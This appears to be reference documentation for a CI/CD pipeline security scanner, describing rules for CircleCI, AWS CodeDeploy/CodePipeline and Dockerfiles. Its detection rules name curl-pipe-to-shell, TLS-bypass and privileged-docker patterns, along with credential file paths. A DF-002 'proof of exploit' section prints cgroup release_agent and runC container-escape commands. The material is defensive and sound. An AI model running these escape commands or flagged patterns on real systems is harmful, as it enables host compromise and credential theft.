Recommendation. Move secret-like variables (PASSWORD, TOKEN, SECRET, API_KEY) into a CircleCI context and reference the context in the workflow job configuration. Contexts support security groups and audit logging that inline environment: blocks lack.
Source: CC-004 in the CircleCI provider.
CC-005: AWS auth uses long-lived access keys in environment block MEDIUM 🔧 fix
Evidences: 1.3.4 Ensure organization identity is required for contribution (no long-lived personal tokens).
How this is detected. Long-lived AWS access keys declared directly in a job's environment: block are visible to anyone who can read the config. They cannot be rotated automatically and remain valid until manually revoked. OIDC-based federation yields short-lived credentials per build.
Recommendation. Remove AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY from the job environment: block. Use CircleCI's OIDC token with aws-cli/setup orb's role-based auth, or store credentials in a context with security group restrictions.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-005 in the CircleCI provider.
CC-006: Artifacts not signed (no cosign/sigstore step) MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked).
How this is detected. Unsigned artifacts cannot be verified downstream, so a tampered build is indistinguishable from a legitimate one. The check recognises cosign, sigstore, slsa-framework, and notation-sign as signing tools.
Recommendation. Add a signing step to the pipeline, e.g. install cosign and run cosign sign, or use the sigstore CLI. Publish the signature alongside the artifact and verify it at consumption time.
Source: CC-006 in the CircleCI provider.
CC-007: SBOM not produced (no CycloneDX/syft/Trivy-SBOM step) MEDIUM
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Without an SBOM, downstream consumers cannot audit the exact set of dependencies shipped in the artifact, delaying vulnerability response when a transitive dep is disclosed. The check recognises CycloneDX, syft, Anchore SBOM action, spdx-sbom-generator, Microsoft sbom-tool, and Trivy in SBOM mode.
Recommendation. Add an SBOM generation step, syft . -o cyclonedx-json, Trivy with --format cyclonedx, or Microsoft's sbom-tool. Attach the SBOM to the build artifacts so consumers can ingest it into their vulnerability management pipeline.
Source: CC-007 in the CircleCI provider.
CC-008: Credential-shaped literal in config body CRITICAL 🔧 fix
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data, 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. Every string in the config is scanned against a set of credential patterns (AWS access keys, GitHub tokens, Slack tokens, JWTs, Stripe, Google, Anthropic, etc.). A match means a secret was pasted into YAML, the value is visible in every fork and every build log and must be treated as compromised.
Recommendation. Rotate the exposed credential immediately. Move the value to a CircleCI project environment variable or a context and reference it via the variable name. For cloud access, prefer OIDC federation over long-lived keys.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example
AKIAIOSFODNN7EXAMPLEis deliberately NOT suppressed, if it appears in a real pipeline it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.
Source: CC-008 in the CircleCI provider.
CC-009: Deploy job missing manual approval gate MEDIUM
Evidences: 2.3.8 Ensure pipeline configuration files are reviewed before execution, 5.1.4 Ensure deployment configuration manifests are reviewed before apply.
How this is detected. In CircleCI, manual approval is implemented by adding a job with type: approval to the workflow and making the deploy job require it. Without this gate, any push to the triggering branch deploys immediately with no human review.
Recommendation. Add a type: approval job that precedes the deploy job in the workflow, and list it in the deploy job's requires:. This ensures a human must click Approve in the CircleCI UI before production changes roll out.
Source: CC-009 in the CircleCI provider.
CC-010: Self-hosted runner without ephemeral marker MEDIUM
Evidences: 2.1.3 Ensure the build environment is hardened, 2.1.6 Ensure build workers have minimal network connectivity.
How this is detected. Self-hosted runners that persist between jobs leak filesystem and process state. A PR-triggered job writes to /tmp; a subsequent prod-deploy job on the same runner reads it. The check looks for resource_class values containing 'self-hosted', if found, it checks for 'ephemeral' in the value. Also checks for machine: true combined with a self-hosted resource class.
Recommendation. Configure self-hosted runners to tear down between jobs. Use a resource_class value that includes an ephemeral marker, or use CircleCI's machine executor with runner auto-scaling so each job gets a fresh environment.
Source: CC-010 in the CircleCI provider.
CC-011: No store_test_results step (test results not archived) LOW
Evidences: 2.3.7 Ensure pipeline steps produce audit logs.
How this is detected. Without store_test_results, test output is only available in the raw build log. Archiving test results enables CircleCI's test insights, timing-based splitting, and provides an audit trail that links each build to its test outcomes.
Recommendation. Add a store_test_results step to jobs that run tests. This archives test results in CircleCI for traceability, trend analysis, and debugging flaky tests.
Source: CC-011 in the CircleCI provider.
CC-012: Dynamic config via setup: true enables code injection MEDIUM
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. When setup: true is set at the top level, the config becomes a setup workflow. It generates the real pipeline config dynamically (typically via the circleci/continuation orb). An attacker who controls the setup job (e.g. via a malicious PR in a fork) can inject arbitrary config for all subsequent jobs, including deploy steps with production secrets.
Recommendation. If setup: true is required, restrict the setup job to a trusted branch filter and audit the generated config carefully. Ensure the continuation orb's configuration_path points to a checked-in file, not a dynamically generated one that could be influenced by PR content.
Source: CC-012 in the CircleCI provider.
CC-013: Deploy job in workflow has no branch filter MEDIUM
Evidences: 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. Without branch filters, a deploy job triggers on every branch push, including feature branches and forks. Restricting sensitive jobs to specific branches limits the blast radius of a compromised commit.
Recommendation. Add filters.branches.only to deploy-like workflow jobs so they only run on protected branches (e.g. main, release/*).
Source: CC-013 in the CircleCI provider.
CC-014: Job missing resource_class declaration MEDIUM
Evidences: 2.1.6 Ensure build workers have minimal network connectivity.
How this is detected. Without an explicit resource_class, CircleCI assigns a default executor. Declaring the class documents the expected scope and prevents accidental use of larger (or self-hosted) executors that may have elevated privileges.
Recommendation. Add resource_class: to every job to explicitly control the executor size and capabilities. Use the smallest class that satisfies build requirements.
Source: CC-014 in the CircleCI provider.
CC-015: No no_output_timeout configured MEDIUM 🔧 fix
Evidences: 2.2.2 Ensure build workers are single-use.
How this is detected. Without no_output_timeout, a hung step can consume executor time indefinitely. Explicit timeouts cap cost and the window during which a compromised step has access to secrets and the build environment.
Recommendation. Add no_output_timeout: to long-running run steps, or set it at the job level. A reasonable default is 10-30 minutes. CircleCI's default of 10 minutes may be too long for some pipelines and absent for others.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-015 in the CircleCI provider.
CC-016: Remote script piped to shell interpreter HIGH 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a CircleCI config. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the CI runner.
Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.
Source: CC-016 in the CircleCI provider.
CC-017: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a CircleCI config give the container full access to the runner, enabling container escape and lateral movement.
Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-017 in the CircleCI provider.
CC-018: Package install from insecure source HIGH 🔧 fix
Evidences: 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Detects package-manager invocations that use plain HTTP registries (--index-url http://, --registry=http://) or disable TLS verification (--trusted-host, --no-verify) in a CircleCI config. These patterns allow man-in-the-middle injection of malicious packages.
Recommendation. Use HTTPS registry URLs. Remove --trusted-host and --no-verify flags. Pin to a private registry with TLS.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-018 in the CircleCI provider.
CC-019: add_ssh_keys without fingerprint restriction HIGH
Evidences: 1.3.4 Ensure organization identity is required for contribution (no long-lived personal tokens).
How this is detected. A bare - add_ssh_keys step (without fingerprints:) loads every SSH key configured on the project into the job. This violates least privilege, the job gains access to keys it does not need, increasing the blast radius if the job is compromised.
Recommendation. Always specify fingerprints: when using add_ssh_keys to restrict which SSH keys are loaded into the job. A bare add_ssh_keys step loads ALL project SSH keys.
Source: CC-019 in the CircleCI provider.
CC-020: No vulnerability scanning step MEDIUM
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck.
Recommendation. Add a vulnerability scanning step, trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.
Source: CC-020 in the CircleCI provider.
CC-021: Package install without lockfile enforcement MEDIUM 🔧 fix
Evidences: 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Detects package-manager install commands that do not enforce a lockfile or hash verification. Without lockfile enforcement the resolver pulls whatever version is currently latest, exactly the window a supply-chain attacker exploits.
Recommendation. Use lockfile-enforcing install commands: npm ci instead of npm install, pip install --require-hashes -r requirements.txt, yarn install --frozen-lockfile, bundle install --frozen, and go install tool@v1.2.3.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-021 in the CircleCI provider.
CC-022: Dependency update command bypasses lockfile pins MEDIUM 🔧 fix
Evidences: 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Detects pip install --upgrade, npm update, yarn upgrade, bundle update, cargo update, go get -u, and composer update. These commands bypass lockfile pins and pull whatever version is currently latest. Tooling upgrades (pip install --upgrade pip) are exempted.
Recommendation. Remove dependency-update commands from CI. Use lockfile-pinned install commands (npm ci, pip install -r requirements.txt) and update dependencies via a dedicated PR workflow (e.g. Dependabot, Renovate).
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Common build-tool bootstrapping idioms (
pip install --upgrade pip,pip install --upgrade setuptools wheel virtualenv) and security-tool installs (pip install --upgrade pip-audit / cyclonedx-bom / semgrep) are exempted by theDEP_UPDATE_REtooling allowlist. Other tooling-upgrade idioms not yet on the list can still trip the rule. Defaults to MEDIUM confidence so CI gates can require--min-confidence HIGHto ignore.
Source: CC-022 in the CircleCI provider.
CC-023: TLS / certificate verification bypass HIGH 🔧 fix
Evidences: 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.
Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-023 in the CircleCI provider.
CD-001: Automatic rollback on failure not enabled MEDIUM
Evidences: 5.1.4 Ensure deployment configuration manifests are reviewed before apply.
How this is detected. Without autoRollbackConfiguration, a CodeDeploy deployment that fails leaves the failed revision live until an operator notices. The default is opt-in, not opt-out, deployments fail-open, not fail-back.
Recommendation. Enable autoRollbackConfiguration with at least the DEPLOYMENT_FAILURE event so CodeDeploy automatically reverts to the last successful revision when a deployment fails.
Source: CD-001 in the AWS provider.
CD-002: AllAtOnce deployment config, no canary or rolling strategy HIGH
Evidences: 5.1.4 Ensure deployment configuration manifests are reviewed before apply, 5.2.1 Ensure deployment environments are separated.
How this is detected. AllAtOnce shifts 100% of traffic to the new revision in one step. There's no gradient to halt on if a CloudWatch alarm trips mid-rollout, the bad revision is already serving every request. Canary / linear configs introduce the shift-then-watch shape that lets monitors catch a regression before it's universal.
Recommendation. Switch to a canary or linear deployment configuration (e.g. CodeDeployDefault.LambdaCanary10Percent5Minutes or a custom rolling config) so that defects are caught before they affect all instances or traffic.
Source: CD-002 in the AWS provider.
CD-003: No CloudWatch alarm monitoring on deployment group MEDIUM
Evidences: 5.2.3 Ensure deployment environment activity is audited.
How this is detected. Alarm-based rollback is what lets a canary configuration actually stop a bad deploy mid-flight. Without alarms wired into alarmConfiguration, CodeDeploy's only signal that the deploy went wrong is the deployment-state machine itself, which doesn't notice an application-level regression. CD-002's canary work and this rule's alarm-based halt are paired.
Recommendation. Add CloudWatch alarms (e.g. error rate, 5xx count, latency p99) to the deployment group's alarmConfiguration. Enable automatic rollback on DEPLOYMENT_STOP_ON_ALARM to halt bad deployments.
Source: CD-003 in the AWS provider.
CP-001: No approval action before deploy stages HIGH
Evidences: 2.3.8 Ensure pipeline configuration files are reviewed before execution, 5.1.4 Ensure deployment configuration manifests are reviewed before apply.
How this is detected. A pipeline that goes Source -> Build -> Deploy with no Approval action means every commit on the source branch ships, with no human ack between code-merged and code-running-in-prod. The Manual approval action is the intentional pause point, combine with CP-005 for production-tagged stages specifically.
Recommendation. Add a Manual approval action to a stage that precedes every Deploy stage that targets a production or sensitive environment.
Source: CP-001 in the AWS provider.
CP-002: Artifact store not encrypted with customer-managed KMS key MEDIUM
Evidences: 2.4.2 Ensure pipeline integrity, artifacts are signed by the pipeline, 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked).
How this is detected. The pipeline's S3 artifact store holds intermediate build outputs handed between stages. Default SSE-S3 (AES256) encrypts at rest but uses an AWS-owned key whose policy you can't scope. A customer-managed CMK gives the same key-policy + CloudTrail Decrypt-event audit story you'd apply to Lambda code, Secrets Manager, or any other build output.
Recommendation. Configure a customer-managed AWS KMS key as the encryptionKey for each artifact store. This enables key rotation, fine-grained access policies, and CloudTrail auditing of decrypt operations.
Source: CP-002 in the AWS provider.
CP-003: Source stage using polling instead of event-driven trigger LOW
Evidences: 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. PollForSourceChanges=true polls the source repo every minute or two. Beyond the API-quota and latency cost, polling produces a less-useful CloudTrail story than event-driven triggers. You see the poll calls, not the specific commit that started the pipeline. EventBridge / CodeCommit triggers tie each pipeline start to the originating event.
Recommendation. Set PollForSourceChanges=false and configure an Amazon EventBridge rule or CodeCommit trigger to start the pipeline on change. This reduces latency, API usage, and improves auditability.
Known false positives.
PollForSourceChanges=trueis the CFN default for CodeCommit sources, so legacy templates can carry the flag without an active design decision behind it. The rule is advisory (consider EventBridge / CodeStarSourceConnection) rather than a real risk; defaults to LOW confidence so CI gates default-filter it.
Source: CP-003 in the AWS provider.
CP-004: Legacy ThirdParty/GitHub source action (OAuth token) HIGH
Evidences: 1.3.4 Ensure organization identity is required for contribution (no long-lived personal tokens).
How this is detected. The legacy ThirdParty/GitHub source-action provider stores a long-lived OAuth token in the pipeline's action configuration. The token has whatever scope the granting GitHub user has, never rotates, and isn't directly revocable from the AWS side. CodeConnections (formerly CodeStar Connections) replaces this with an AWS-managed connection that the GitHub user can revoke.
Recommendation. Migrate to owner=AWS, provider=CodeStarSourceConnection and reference a CodeConnections connection ARN.
Source: CP-004 in the AWS provider.
DF-001: FROM image not pinned to sha256 digest HIGH 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Reuses _primitives/image_pinning.classify so the floating-tag semantics match GL-001 / JF-009 / ADO-009 / CC-003. PINNED_TAG (e.g. python:3.12.1-slim) is treated as unpinned here too, only an explicit @sha256: survives, since the tag is mutable on the registry side.
Recommendation. Resolve every base image to its current digest (docker buildx imagetools inspect <ref> prints it) and pin via FROM repo@sha256:<digest>. Automate refreshes with Renovate or Dependabot. A floating tag (:latest, :3, no tag) silently swaps the build base under every rebuild.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- Docker Hub typosquatting / namespace-takeover incidents (2017 onward): docker-library Sysdig and Aqua research documented thousands of malicious images uploaded under near-miss names (
alpinevsalphine, etc.) and occasional namespace recoveries shipping crypto-miners downstream. Digest-pinned consumers are immune; tag-pinned consumers pull whatever sits under the name today. - Codecov
codecov/codecov-actiontag-mutation incident (post-Codecov-Bash-uploader compromise): the upstream rotated the action's@v3tag during the fallout, and consumers pinning to the tag silently re-ran a different build than before. Digest pinning would have surfaced the change as a checksum mismatch instead of a silent swap.
Source: DF-001 in the Dockerfile provider.
DF-002: Container runs as root (missing or root USER directive) HIGH 🔧 fix
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Multi-stage builds: only the final stage matters for runtime identity, since intermediate stages don't ship. The check scopes USER to the last FROM through end-of-file.
Recommendation. Add a USER <non-root> directive after package install steps (e.g. USER 1001 or USER appuser). Running as root inside a container is not isolation, a kernel CVE, a misconfigured mount, or a mis-applied capability collapses straight into the host.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- CVE-2019-5736 (runC host breakout): a malicious container running as root could overwrite the host's runC binary and compromise every other container on the node. Non-root containers were not exploitable.
- CVE-2022-0492 (cgroups v1 escape via release_agent): root inside a container with CAP_SYS_ADMIN could write to the host's release_agent file and execute arbitrary host code. Containers running as a non-root UID side-stepped the exploit class entirely.
Proof of exploit.
Vulnerable: image runs as root by default (no USER set).
FROM ubuntu:22.04 RUN apt-get update && apt-get install -y python3 COPY app.py /app/ CMD ["python3", "/app/app.py"]
Attack: when the container is breached (RCE in the app, a
kernel CVE, a misconfigured mount), the attacker runs as
UID 0. From there:
# CVE-2019-5736 path: overwrite /proc/self/exe to corrupt
# the host's runC binary — every container on the node
# the next launch executes attacker code on the host:
echo '#!/bin/sh\n/attacker_payload' > /proc/self/exe
# CVE-2022-0492 path: cgroup release_agent escape:
mkdir /tmp/cg && mount -t cgroup -o memory cgroup /tmp/cg
echo '/payload' > /tmp/cg/release_agent
echo 1 > /tmp/cg/notify_on_release
A non-root UID makes both paths fail at the first syscall.
Safe: drop to a dedicated unprivileged user.
FROM ubuntu:22.04 RUN apt-get update && apt-get install -y python3 \ && useradd --uid 1001 --create-home app COPY --chown=app:app app.py /app/ USER 1001 CMD ["python3", "/app/app.py"]
Source: DF-002 in the Dockerfile provider.
DF-003: ADD pulls remote URL without integrity verification HIGH
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. ADD with a URL is the historical Dockerfile footgun: it fetches at build time over HTTP(S) with no checksum and no signature, and the registry tag does not pin the source. A tampered server or DNS hijack silently swaps the content. COPY is for local files; RUN curl + verify is for remote ones.
Recommendation. Replace ADD https://... with a multi-step RUN: download the file with curl -fsSLo, verify a known-good checksum (sha256sum -c) or signature (cosign verify-blob), then extract / install. Better still: download the artifact in a builder stage and COPY it across. That way the verifier runs once at build time, not per-pull.
Source: DF-003 in the Dockerfile provider.
DF-004: RUN executes a remote script via curl-pipe / wget-pipe HIGH
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Reuses _primitives/remote_script_exec.scan so the vocabulary matches the equivalent CI-side rules (GHA-016, GL-016, BB-012, ADO-016, CC-016, JF-016).
Recommendation. Download to a file, verify checksum or signature, then execute. curl -fsSL <url> -o /tmp/x.sh && sha256sum -c <(echo '<digest> /tmp/x.sh') && bash /tmp/x.sh. Vendor installers from well-known hosts (rustup.rs, get.docker.com, ...) are reported with vendor_trusted=true so reviewers can calibrate.
Source: DF-004 in the Dockerfile provider.
DF-005: RUN uses shell-eval (eval / sh -c on a variable / backticks) HIGH
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Reuses _primitives/shell_eval.scan, same primitive used by GHA-028 / GL-026 / BB-026 / ADO-027 / CC-027 / JF-030 so the safe / unsafe vocabulary matches across the tool.
Recommendation. Replace eval "$X" and sh -c "$X" with explicit argv invocations. If the build genuinely needs a templated command, render it through a sealed config file or use RUN --mount=type=secret with explicit input. $( … ) / backticks should never wrap interpolated user-controlled vars inside a Dockerfile.
Source: DF-005 in the Dockerfile provider.
DF-006: ENV or ARG carries a credential-shaped literal value CRITICAL
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data.
How this is detected. Reuses _primitives/secret_shapes, flags AKIA-prefixed AWS keys outright (the literal AWS access-key shape) and credential-named keys (API_KEY, DB_PASSWORD, SECRET_TOKEN) when the value is a non-empty literal.
Recommendation. Never hard-code credentials in a Dockerfile. ENV values are baked into the image layer history, even if the value is later overwritten, docker history --no-trunc reads the original. Use RUN --mount=type=secret for build-time secrets or runtime env injection (docker run -e SECRET=…) for runtime ones. Rotate any secret already exposed.
Source: DF-006 in the Dockerfile provider.
DF-008: RUN invokes docker --privileged or escalates capabilities HIGH
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Mirrors GHA-017 / GL-017 / BB-013 / ADO-017 / CC-017 / JF-017 (docker run --privileged in CI scripts) but at Dockerfile build time. The risk is subtler: a privileged RUN step doesn't directly elevate the resulting image, but it gives the build host's docker daemon a chance to escape, and any tampered base image can exploit the elevated build.
Recommendation. A Dockerfile build step almost never legitimately needs --privileged or --cap-add SYS_ADMIN / ALL. If the build genuinely requires elevated capabilities (e.g. compiling a kernel module), do it in a sealed builder image and COPY the artifact out, don't carry the privileged execution into the runtime image.
Source: DF-008 in the Dockerfile provider.
DF-010: apt-get dist-upgrade / upgrade pulls unknown package versions LOW
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified.
How this is detected. Running apt-get upgrade (or dist-upgrade) inside a Dockerfile is the classic pet-vs-cattle anti-pattern. Two back-to-back builds with the same Dockerfile can produce different images because the upstream archive moved between the two RUN invocations. dist-upgrade additionally relaxes dependency resolution. It can install / remove arbitrary packages to satisfy upgrades, so the resulting image's package set isn't even bounded by what the Dockerfile declares.
Recommendation. Drop the upgrade step. Build on a recent base image instead (rebuild your image when the base image gets a security patch, pin the base by digest per DF-001 so the rebuild is deterministic). apt-get install pkg=<version> for specific packages stays reproducible; upgrade / dist-upgrade does not.
Source: DF-010 in the Dockerfile provider.
DF-011: Package manager install without cache cleanup in same layer LOW
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified.
How this is detected. Each Dockerfile RUN produces a layer. Installing packages in one layer and cleaning the cache in a later layer leaves the cache files in the lower layer forever, final image size is unchanged and the residual files broaden the attack surface (e.g. apt's signed-by keys, package metadata). The fix is layout, not behavior: do install + cleanup in the same RUN.
Recommendation. Combine the install and cleanup into the same RUN so the cache lands in a single layer that gets discarded together. Idiomatic pattern: RUN apt-get update && apt-get install -y <pkgs> && rm -rf /var/lib/apt/lists/*. Equivalent forms: apk add --no-cache <pkgs>, dnf install -y … && dnf clean all, yum install -y … && yum clean all, zypper -n in … && zypper clean -a.
Source: DF-011 in the Dockerfile provider.
DF-012: RUN invokes sudo HIGH
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. sudo inside a Dockerfile is almost always a copy-paste from a host README. Its presence usually means one of three things, all of them wrong: (a) the build is silently running as root and the operator misread it, (b) the image carries an unrestricted sudoers line that a runtime escape can abuse, or (c) the package install chain depends on TTY-aware sudo behavior that breaks under non-TTY docker build. None of these cases benefit from keeping the directive.
Recommendation. Drop sudo from the RUN. Either the build is already running as root (the default before any USER directive), in which case sudo is no-op noise, or the build switched to a non-root USER and needs root for a specific step, in which case temporarily revert with USER root for that RUN and switch back afterward.
Source: DF-012 in the Dockerfile provider.
DF-013: EXPOSE declares sensitive remote-access port CRITICAL 🔧 fix
Evidences: 2.1.3 Ensure the build environment is hardened, 2.1.6 Ensure build workers have minimal network connectivity.
How this is detected. EXPOSE is documentation, not a firewall. It doesn't actually open the port. But EXPOSE 22 is a strong signal the image runs sshd, and any remote-access daemon inside the container blows up the threat model: now you have an extra auth surface, an extra service to keep patched, and a way for a compromised app to phone home from the outside. The container runtime / orchestrator's exec path covers every operational use case sshd traditionally served.
Recommendation. Remove the EXPOSE line for the remote-access port. If the operator legitimately needs to reach the container, exec into it (docker exec / kubectl exec). That path uses the orchestrator's auth and audit, doesn't open a network port, and doesn't ship an extra daemon inside the image. Containers should not run sshd / telnetd / ftpd / rsh-d / vncd / RDP alongside the application.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: DF-013 in the Dockerfile provider.
DF-014: WORKDIR set to a system / kernel filesystem path CRITICAL
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Subsequent directives in the Dockerfile (COPY src dest, RUN writes, ADD …) resolve relative paths against the active WORKDIR. A WORKDIR /sys followed by COPY conf.txt config.txt writes into the kernel's sysfs surface, at best a build-time error, at worst a container-escape primitive that lets a compromised step manipulate cgroups, devices, or kernel config.
Recommendation. Move WORKDIR to a dedicated app directory (/app, /srv/app, /opt/<service>). System paths like /sys, /proc, /dev, /etc, / and the root home are not application directories, pointing the working dir at one means subsequent COPY / RUN writes target kernel-exposed namespaces or admin-only configuration.
Source: DF-014 in the Dockerfile provider.
DF-015: RUN grants world-writable permissions (chmod 777 / a+w) MEDIUM
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. World-writable directories under / are an established container-escape vector: any compromised process running as non-root can drop a payload that root-owned daemons later execute. The rule fires on the literal 777, a+w, and a+rwx modes; the more conservative 775 and ugo+x are not flagged.
Recommendation. Replace chmod 777 <path> with the narrowest permissions the workload actually needs. chmod 755 is enough for executables under a read-only root filesystem; 640 or 600 for files the runtime user reads. a+w is almost always copy-pasted from a SO answer and almost never the correct fix.
Known false positives.
- Test fixtures or scratch builds that intentionally share a directory across multiple non-root users may legitimately use
777. Suppress with an ignore-file entry rather than weakening the rule.
Source: DF-015 in the Dockerfile provider.
DF-016: Image lacks OCI provenance labels LOW
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. The OCI image-spec annotation set is a small de facto standard maintained by the OCI working group. Only image.source and image.revision are checked because they're the two whose absence makes incident response materially harder; image.title / image.description are nice-to-have but the rule doesn't fire on those.
Recommendation. Add a LABEL line carrying at least org.opencontainers.image.source (the URL of the source repo) and org.opencontainers.image.revision (the commit SHA built into the image). Most registries surface those fields in the UI and on manifest inspect, which closes the source-to-image gap that GHA-006 / SLSA Build-L2 provenance attestation also addresses.
Known false positives.
- A multi-stage build's intermediate stages don't need provenance labels, only the final image ships. The rule fires per Dockerfile, not per stage; suppress for files where the final
FROMis intentional throwaway scratch.
Source: DF-016 in the Dockerfile provider.
DF-017: ENV PATH prepends a world-writable directory MEDIUM 🔧 fix
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. A writable PATH entry that comes before the system bins lets any process inside the container shadow ls, ps, apt-get, cat, etc. by dropping a binary of the same name into the writable dir. On a multi-tenant image, or any image where an exploit can reach the filesystem, this is a free privilege-escalation vector.
Recommendation. Don't put /tmp, /var/tmp, /dev/shm, or any other world-writable path in PATH ahead of the system binary directories. Drop those entries entirely, or place them at the tail (ENV PATH=/usr/bin:$PATH:/tmp) so legitimate binaries always shadow anything dropped into the writable dir at runtime.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: DF-017 in the Dockerfile provider.
DF-018: RUN chown rewrites ownership of a system path MEDIUM
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Recognises chown and chgrp invocations whose first non-flag path argument resolves under a system directory. The non-recursive case is also flagged because a single chown user /etc is just as harmful, the recursive flag matters for the size of the blast radius, not for whether it's wrong. Application paths under /opt, /srv, /var/lib/<app>, and /app are not flagged.
Recommendation. Don't chown system directories at build time. If the runtime user needs to own a workload-specific subtree, COPY --chown=<user>:<group> it into the image at the subtree root, or place the workload under a dedicated directory (e.g. /app, /srv/app) and chown only that path. Granting the runtime user write access to /etc, /usr, /sbin, or /lib lets a process exploit later steps to stage a binary the system trusts.
Source: DF-018 in the Dockerfile provider.
DF-019: COPY/ADD source path looks like a credential file HIGH 🔧 fix
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data.
How this is detected. Fires on any COPY or ADD whose source basename is a well-known credential filename (id_rsa, .npmrc, .netrc, .env, terraform.tfvars, …) or whose path tail matches a canonical credential location (.aws/credentials, .docker/config.json, .kube/config). Files with private-key extensions (.pem, .key, .p12, .pfx, .jks) are also flagged. Globs are not expanded, the rule reads the literal source token.
